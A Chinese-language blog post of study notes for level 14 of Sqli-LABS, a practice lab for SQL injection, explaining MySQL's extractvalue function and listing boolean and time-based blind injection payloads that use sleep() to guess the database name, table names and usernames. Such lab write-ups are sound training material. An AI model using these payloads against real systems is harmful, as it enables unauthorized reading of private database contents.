zoukankan      html  css  js  c++  java
  • Sqli-LABS通关笔录-14

    这一节让我学习到了

    1.extractvalue函数(该函数用于对xml文件进行查询和修改,于此相关的还有一个叫“updatexml”函数)

    语法:extractvalue(XML_document, XPath_string); 
        第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
        第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。

        作用:从目标XML中返回包含所查询值的字符串

    关于该函数的介绍使用:http://www.blogjava.net/chenpengyi/archive/2006/07/11/57578.html

    2.

    Payload:

    admin" and 1=1#

    这题方法也是要用盲注。

    ------------------------------------------------------------------------------------------------

    延时Payload:

    猜数据库:admin" and if(ascii(substring(database(),1,1))=115,sleep(10),1)--+

    猜表:admin" AND if(ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>1,sleep(20),1)# 

    猜列明:admin" AND if(ascii(substr((select username from security.users order by id limit 0,1),2,1))=117,sleep(10),1)#

    ------------------------------------------------------------------------------------------------

    THE END


  • 相关阅读:
    docker commit
    镜像原理
    docker command1
    docker镜像命令
    docker work machine
    视图
    后台管理
    模型类
    docker command
    安装virtualenv
  • 原文地址:https://www.cnblogs.com/xishaonian/p/6133467.html
Copyright © 2011-2022 走看看